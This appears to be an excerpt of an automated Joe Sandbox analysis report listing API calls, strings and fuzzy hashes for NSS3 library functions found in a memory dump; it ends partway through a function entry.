Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 3742ab6840430707df4c71e5785b6da5ba3e1f5105aedd6f15b94b593813ec64
Instruction ID: 2e5fcf56d354a75ec6a64b8e34e84a6733ebe222d4db78e047c326c431dc7a0b
Opcode Fuzzy Hash: 3742ab6840430707df4c71e5785b6da5ba3e1f5105aedd6f15b94b593813ec64
Instruction Fuzzy Hash: 6CB16571E012299FDF21DBE9DA4479E77B4BF05349F242824E818E7640E731E918CBE1

Function 6C834C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C834C4C
EnterCriticalSection.KERNEL32(?), ref: 6C834C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C834CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C834CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C834CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C834D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C834D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C834DB7

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

TlsGetValue.KERNEL32 ref: 6C834DD7
EnterCriticalSection.KERNEL32(?), ref: 6C834DEC
PR_Unlock.NSS3(?), ref: 6C834E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C834E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C834E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C834E71
free.MOZGLUE(00000000), ref: 6C834E7A
PR_Unlock.NSS3(?), ref: 6C834EA2
TlsGetValue.KERNEL32 ref: 6C834EC1
EnterCriticalSection.KERNEL32(?), ref: 6C834ED6
PR_Unlock.NSS3(?), ref: 6C834F01
free.MOZGLUE(00000000), ref: 6C834F2A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 2fbdcb8b43c44d14e9aa5da91fbd1c22f745a22359cdaef50fbac31b35195368
Instruction ID: 4175ae6d419310e5a2fa23ec94508d44a7276af60cb57839a38232a4a6a91756
Opcode Fuzzy Hash: 2fbdcb8b43c44d14e9aa5da91fbd1c22f745a22359cdaef50fbac31b35195368
Instruction Fuzzy Hash: BFB16871A04215DFDF10EFA8C944AAA7BB4BF85318F546828EC0997B41E732E924CBD1

Function 6C886E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C886BF7), ref: 6C886EB6

Part of subcall function 6C7E1240: TlsGetValue.KERNEL32(00000040,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E1267
Part of subcall function 6C7E1240: EnterCriticalSection.KERNEL32(?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E127C
Part of subcall function 6C7E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E1291
Part of subcall function 6C7E1240: PR_Unlock.NSS3(?,?,?,?,6C7E116C,NSPR_LOG_MODULES), ref: 6C7E12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C92FC0A,6C886BF7), ref: 6C886ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C886EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C886EFC
PR_NewLock.NSS3 ref: 6C886F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C886F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C886BF7), ref: 6C886F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C886BF7), ref: 6C886F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C886BF7), ref: 6C886FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C886BF7), ref: 6C886FFD

Strings

NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C886F4F
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C886EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C886FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C886FDB
SSLFORCELOCKS, xrefs: 6C886F2B
SSLKEYLOGFILE, xrefs: 6C886EB1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 11bd5aca8b53496850f40aa2929e8773be1105e638d3113b43b90169140f475f
Instruction ID: fffc9c2d6ddafdbbd9bf519552c7e4714f4e967410ca136ad11457809d8f6041
Opcode Fuzzy Hash: 11bd5aca8b53496850f40aa2929e8773be1105e638d3113b43b90169140f475f
Instruction Fuzzy Hash: 60A107B2B6B99587E720463CCE0175832B2AB9332EFA84B65F935C7ED5DB35D4408342

Function 6C7FC4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7FC4D5

Part of subcall function 6C84BE30: SECOID_FindOID_Util.NSS3(6C80311B,00000000,?,6C80311B,?), ref: 6C84BE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7FC516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7FC530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7FC54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C7FC5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C7FC712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C7FC725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7FC742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7FC751
PL_FinishArenaPool.NSS3(?), ref: 6C7FC77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C7FC78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C7FC7A9

Strings

security, xrefs: 6C7FC63F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: 4232305ad8a3242d2733d62187f758ec76031eb4a42f670f82f951133ab445ed
Instruction ID: b259daebd2f7c98296e0a5639a10b774e134f4812fb452aab44e8e03071a5a3e
Opcode Fuzzy Hash: 4232305ad8a3242d2733d62187f758ec76031eb4a42f670f82f951133ab445ed
Instruction Fuzzy Hash: AE811BB1D041099AEF30EA64CEC1BEE7774EF0130EF644535D921A7B51E361E94ACAA2

Function 6C828500 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C828526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C828554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C828563

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C828579
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C82859A
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C8285B3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C8285CC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C8285E7
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C828659

Strings

C_DecryptDigestUpdate, xrefs: 6C828521
pEncryptedPart = 0x%p, xrefs: 6C828595
hSession = 0x%x, xrefs: 6C82853E, 6C82854E
(CK_INVALID_HANDLE), xrefs: 6C82855C
*pulPartLen = 0x%x, xrefs: 6C828654
pPart = 0x%p, xrefs: 6C8285C7
pulPartLen = 0x%p, xrefs: 6C8285E2
ulEncryptedPartLen = %d, xrefs: 6C8285AE

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate
API String ID: 1003633598-1019776760
Opcode ID: cec8f323d23bb4af2abae67fc9bb2ab0cbb935726ee4de82ec2a99b59a155710
Instruction ID: 8be062de30f262a03419ddd0851583a697145d53e4838b2377795696f9452486
Opcode Fuzzy Hash: cec8f323d23bb4af2abae67fc9bb2ab0cbb935726ee4de82ec2a99b59a155710
Instruction Fuzzy Hash: 8141F372A05104EFDB108F54DE4DE8A3BB2AB5231DF98442AE80867B11DB34C998CBD1

Function 6C826D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C826D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C826DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C826DC3

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C826DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C826DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C826E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C826E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C826E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C826EB9

Strings

ulDataLen = %d, xrefs: 6C826E0E
C_Digest, xrefs: 6C826D81
pDigest = 0x%p, xrefs: 6C826E27
hSession = 0x%x, xrefs: 6C826D9E, 6C826DAE
*pulDigestLen = 0x%x, xrefs: 6C826EB4
(CK_INVALID_HANDLE), xrefs: 6C826DBC
pData = 0x%p, xrefs: 6C826DF5
pulDigestLen = 0x%p, xrefs: 6C826E42

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: eafe9ed8a576f79b7be3e37aa648c89d6ebd3636feda9943a1d5f1605f4103e6
Instruction ID: 44ae70d50b612a5e01875a2ce95f68be779500bef8177feadae9dff090fcddcd
Opcode Fuzzy Hash: eafe9ed8a576f79b7be3e37aa648c89d6ebd3636feda9943a1d5f1605f4103e6
Instruction Fuzzy Hash: 2B41E475A05408EFDB109F64DE4DF8A3BB2AB9231DFA44425E80897B11DB35D948CBD2

Function 6C864500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C863803,?,6C863817,00000000), ref: 6C86450E

Part of subcall function 6C8507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7F8298,?,?,?,6C7EFCE5,?), ref: 6C8507BF
Part of subcall function 6C8507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8507E6
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C85081B
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C850825

PR_SetError.NSS3(FFFFE005,00000000,?,6C863817,00000000), ref: 6C864550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C8645B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C864709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C864727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C86473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C864801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C922DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C86482E
PR_GetCurrentThread.NSS3 ref: 6C8648F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C864923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C864937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C86494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C864963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C864984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C8621C2,?,?,?), ref: 6C86499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8649B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C8649C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C8649DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8649E9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 15a60568bf51bd1dc6002ca3c4080a7a946e482e4e86f58a19c5a9848a39473b
Instruction ID: a23c6bdbeb82cbe42ed2cd64182b8871485f1c714744afbb593b4a1a71d5c70b
Opcode Fuzzy Hash: 15a60568bf51bd1dc6002ca3c4080a7a946e482e4e86f58a19c5a9848a39473b
Instruction Fuzzy Hash: 58A117B1E012089BEF30CA6ADE60BEE3675ABC531CF144839E905A7F91E731E844C791

Function 6C848E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C848E01,00000000,6C849060,6C950B64), ref: 6C848E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C848E01,00000000,6C849060,6C950B64), ref: 6C848E9E
PORT_ArenaAlloc_Util.NSS3(6C950B64,00000001,?,?,?,?,6C848E01,00000000,6C849060,6C950B64), ref: 6C848EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C848E01,00000000,6C849060,6C950B64), ref: 6C848EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C848E01,00000000,6C849060,6C950B64), ref: 6C848ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C848E01,00000000,6C849060,6C950B64), ref: 6C848EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C848E01), ref: 6C848EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C950B64,6C950B64), ref: 6C848F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C848F3F

Part of subcall function 6C84A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C84A421,00000000,00000000,6C849826), ref: 6C84A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C84904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C848E76

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 081ef2ae04d34b4c1c754114596a418972a107572c2e7ca1a9525670cd8a0a62
Instruction ID: 8ba78417c71e1efb736c892ec6d56be6e2f71a457f4bb9c784a201220609e112
Opcode Fuzzy Hash: 081ef2ae04d34b4c1c754114596a418972a107572c2e7ca1a9525670cd8a0a62
Instruction Fuzzy Hash: 686191B5E011099BDB20CF55CE80AABB7B9EF94359F148929DC18A7700E732E915CBE0

Function 6C7F8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C7F8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7F8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C9218D0,?), ref: 6C7F8F03
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C7F8F19
PL_FreeArenaPool.NSS3(?), ref: 6C7F8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7F8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7F8F65
PL_FinishArenaPool.NSS3(?), ref: 6C7F8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C7F8FFE
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C7F9012
PL_FreeArenaPool.NSS3(?), ref: 6C7F9024
PL_FinishArenaPool.NSS3(?), ref: 6C7F902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C7F903E

Strings

security, xrefs: 6C7F8EE7

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 006f50a0cf97e4c6e9d70ab5f1d62a5c3268b2e3007a34dc6659ad758ced6a9e
Instruction ID: 5d50db449d3018689c8fd5196a85fd992844c9241f61d3c3a5729d82af28c996
Opcode Fuzzy Hash: 006f50a0cf97e4c6e9d70ab5f1d62a5c3268b2e3007a34dc6659ad758ced6a9e
Instruction Fuzzy Hash: 7F514971508300ABE7209B1A9E81FAB73E8AB8675CF84093EF46497B80D771D81A8753

Function 6C824E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C824E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C824EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C824EC7

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C824EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C824F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C824F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C824F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C824F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C824F68

Strings

C_GetAttributeValue, xrefs: 6C824E7E
hSession = 0x%x, xrefs: 6C824EA2, 6C824EB2
pTemplate = 0x%p, xrefs: 6C824F4A
hObject = 0x%x, xrefs: 6C824EF5, 6C824F05
(CK_INVALID_HANDLE), xrefs: 6C824EC0, 6C824F13
ulCount = %d, xrefs: 6C824F63

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 5a86ce703d40db15b7568faa5333c42838945de2c3a2466af73a3fff7f5ef766
Instruction ID: 0478cc3e292d34492483e7c40ec3befe7da36bd07a718df750ed4d5825ee0a4e
Opcode Fuzzy Hash: 5a86ce703d40db15b7568faa5333c42838945de2c3a2466af73a3fff7f5ef766
Instruction Fuzzy Hash: 6D41F275705148AFDB108F54DE4CF9B77B6ABE231DF944428E40857B11DB38DA88CBA1

Function 6C824CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

